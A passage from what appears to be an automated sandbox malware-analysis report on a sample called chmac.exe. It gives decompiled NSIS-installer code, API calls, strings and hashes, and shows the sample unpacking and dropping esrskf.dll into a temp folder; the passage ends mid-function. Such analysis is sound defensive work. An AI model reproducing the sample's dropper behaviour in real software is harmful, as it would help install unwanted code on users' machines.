					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x422e41;
						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E00405A85(_t84, E00405578(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E004055BF(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x004035e9
0x004035f2
0x004035f9
0x004035fb
0x0040360f
0x00403621
0x0040362b
0x00403630
0x00403636
0x00403649
0x00403649
0x00403654
0x004035fd
0x004035fd
0x00403608
0x00403608
0x00403659
0x00403663
0x0040366c
0x00403678
0x004036ff
0x00403707
0x00403710
0x00403710
0x00403726
0x0040372c
0x0040373a
0x004037c9
0x004037d1
0x004037db
0x004037e0
0x004037e6
0x00403865
0x0040386a
0x0040386c
0x00403888
0x00000000
0x00403888
0x0040386e
0x00403874
0x0040387c
0x0040387c
0x00000000
0x00403874
0x004037f0
0x00403801
0x00403803
0x00403805
0x0040380c
0x0040380c
0x00403814
0x0040381c
0x0040381e
0x00403820
0x00403829
0x0040382c
0x00403832
0x00403832
0x00403851
0x0040385b
0x00000000
0x00403860
0x004037d3
0x004037d5
0x00000000
0x00403740
0x00403740
0x00403746
0x00403750
0x00403758
0x00403762
0x00403768
0x00403776
0x0040388d
0x0040388d
0x00000000
0x0040388d
0x0040377c
0x00403785
0x004037c4
0x00000000
0x004037c4
0x0040367e
0x0040367e
0x00403683
0x00000000
0x00000000
0x0040368d
0x0040369d
0x004036a2
0x004036a9
0x00000000
0x00000000
0x004036ad
0x004036af
0x004036bc
0x004036bc
0x004036c4
0x004036ca
0x004036f2
0x004036fa
0x00000000
0x004036dc
0x004036dd
0x004036e6
0x004036ec
0x004036ed
0x00000000
0x004036ed
0x004036e8
0x004036ea
0x00000000
0x00000000
0x00000000
0x004036ea
0x004036ca

APIs

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

GetUserDefaultUILanguage.KERNELBASE(00000006,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004035FD

Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0

lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
lstrlenA.KERNEL32(pzusn,?,?,?,pzusn,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ), ref: 004036BF
lstrcmpiA.KERNEL32(?,.exe,pzusn,?,?,?,pzusn,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
GetFileAttributesA.KERNEL32(pzusn), ref: 004036DD
LoadImageA.USER32 ref: 00403726
RegisterClassA.USER32 ref: 0040376D
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
CreateWindowExA.USER32 ref: 004037BE
ShowWindow.USER32(00000005,00000000), ref: 004037F0
LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
GetClassInfoA.USER32 ref: 0040381C
GetClassInfoA.USER32 ref: 00403829
RegisterClassA.USER32 ref: 00403832
DialogBoxParamA.USER32 ref: 00403851

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00403663, 0040366B, 004036F9, 004036FF, 0040370F
.DEFAULT\Control Panel\International, xrefs: 0040363F
RichEdit20A, xrefs: 00403814, 0040381A
RichEdit, xrefs: 00403823
RichEd20, xrefs: 004037FC
Control Panel\Desktop\ResourceLocale, xrefs: 00403617
pzusn, xrefs: 0040368D, 00403695, 004036A2, 004036EC, 004036F2
1033, xrefs: 00403603, 0040364F
RichEd32, xrefs: 00403807
C:\Users\user\AppData\Local\Temp\, xrefs: 004035E7
_Nb, xrefs: 0040377C, 00403781
"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" , xrefs: 004035EF
.exe, xrefs: 004036CC
@6B, xrefs: 00403735

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\AppData\Roaming\dihsw\chmac.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$pzusn
API String ID: 2262724009-3925536986
Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C5B, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00402C5B(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\AppData\\Roaming\\dihsw\\chmac.exe", 0x400);
				_t105 = E0040575C("C:\\Users\\hardz\\AppData\\Roaming\\dihsw\\chmac.exe", 0x80000000, 3);
				 *0x409010 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405A85("C:\\Users\\hardz\\AppData\\Roaming\\dihsw", "C:\\Users\\hardz\\AppData\\Roaming\\dihsw\\chmac.exe");
				E00405A85(0x42b000, E004055BF("C:\\Users\\hardz\\AppData\\Roaming\\dihsw"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x41f048 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BC5(1);
					__eflags =  *0x423eb4;
					if( *0x423eb4 == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405E7D(0x40afb0);
						E0040578B( &_v300, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x409014 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004031DA( *0x423eb4 + 0x1c);
							 *0x41f04c = _t65;
							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
									__eflags =  *0x423ebc;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x41703c; // 0x4d9a0
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E0040571D(0x423ec0, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031DA( *0x417038);
					_t77 = E004031A8( &_a4, 4); // executed
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031A8(0x417048, _t106); // executed
						__eflags = _t83;
						if(_t83 == 0) {
							E00402BC5(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423eb4;
						if( *0x423eb4 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BC5(0);
							}
							goto L19;
						}
						E0040571D( &_v40, 0x417048, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x417038; // 0x3e9c5
						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x423eb4 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x41f048; // 0x41253
						if(__eflags < 0) {
							_v8 = E00405E0F(_v8, 0x417048, _t106);
						}
						 *0x417038 =  *0x417038 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}

APIs

GetTickCount.KERNEL32 ref: 00402C6F
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\dihsw\chmac.exe,00000400), ref: 00402C8B

Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\AppData\Roaming\dihsw\chmac.exe,80000000,00000003), ref: 00405760
Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\AppData\Roaming\dihsw,C:\Users\user\AppData\Roaming\dihsw,C:\Users\user\AppData\Roaming\dihsw\chmac.exe,C:\Users\user\AppData\Roaming\dihsw\chmac.exe,80000000,00000003), ref: 00402CD4
GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B

Strings

Inst, xrefs: 00402D42
C:\Users\user\AppData\Roaming\dihsw, xrefs: 00402CB6, 00402CBB, 00402CC1
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
soft, xrefs: 00402D4B
C:\Users\user\AppData\Roaming\dihsw\chmac.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5
Null, xrefs: 00402D54
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" , xrefs: 00402C68
Error launching installer, xrefs: 00402CAB

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\AppData\Roaming\dihsw\chmac.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\dihsw$C:\Users\user\AppData\Roaming\dihsw\chmac.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-3895572823
Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004055E5(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b68);
					E00405A85();
				}
				E00405CE3(0x409b68);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405D7C(0x409b68);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040573D(0x409b68);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E23(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405A85(0x40a368, 0x424000);
						E00405A85(0x424000, 0x409b68);
						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\hardz\AppData\Local\Temp\nsq5FC4.tmp\esrskf.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405A85(0x424000, 0x40a368);
						_t62 = E00405346("C:\Users\hardz\AppData\Local\Temp\nsq5FC4.tmp\esrskf.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b68);
								_push(0xfffffffa);
								E00404E23();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E23(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
					} else {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
						lstrcatA(0x409b68,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b68);
					E00405346();
					goto L29;
				}
				goto L33;
			}

APIs

lstrcatA.KERNEL32(00000000,00000000,pzusn,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
CompareFileTime.KERNEL32(-00000014,?,pzusn,pzusn,00000000,00000000,pzusn,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D

Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401761
C:\Users\user\AppData\Local\Temp\nsq5FC4.tmp\esrskf.dll, xrefs: 00401801, 0040181D
pzusn, xrefs: 00401750, 00401766, 00401778, 00401789, 004017BF, 004017D5, 004017F3, 00401833, 004018B4, 004018BD, 004018C7, 004018D2
C:\Users\user\AppData\Local\Temp\nsq5FC4.tmp, xrefs: 0040177E, 004017ED, 0040180B

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsq5FC4.tmp$C:\Users\user\AppData\Local\Temp\nsq5FC4.tmp\esrskf.dll$pzusn
API String ID: 1941528284-1109906606
Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE

Uniqueness

Uniqueness Score: -1.00%

Function 00402F01, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423ef8;
					 *0x41703c = _t44;
					SetFilePointer( *0x409014, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E0040302C(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x41703c =  *0x41703c + _t57;
						_t32 = E0040302C(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x41703c =  *0x41703c + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x41703c =  *0x41703c + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

APIs

SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402F28
ReadFile.KERNELBASE(00409128,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
ReadFile.KERNELBASE(00413038,00004000,?,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FAF
WriteFile.KERNELBASE(00000000,00413038,?,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FC7

Strings

80A, xrefs: 00402F8F

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: File$Read$PointerWrite
String ID: 80A
API String ID: 2113905535-195308239
Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040302C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0040302C(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t22;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x41703c; // 0x4d9a0
				_t37 = _t35 -  *0x40afa8 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BC5(1);
					return 0;
				}
				E004031DA( *0x41f04c);
				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
				 *0x41f048 = _t37;
				 *0x417038 = 0;
				while(1) {
					_t12 =  *0x417040; // 0xa1e47
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f04c;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031A8(0x413038, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f04c =  *0x41f04c + _t34;
					 *0x40afc8 = 0x413038;
					 *0x40afcc = _t34;
					L6:
					L6:
					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
						_t22 =  *0x41f048; // 0x41253
						 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
						E00402BC5(0);
					}
					 *0x40afd0 = 0x40b038;
					 *0x40afd4 = 0x8000; // executed
					_t16 = E00405E9D(0x40afb0); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40afd0; // 0x4107e6
					_t40 = _t39 - 0x40b038;
					if(_t40 == 0) {
						__eflags =  *0x40afcc; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
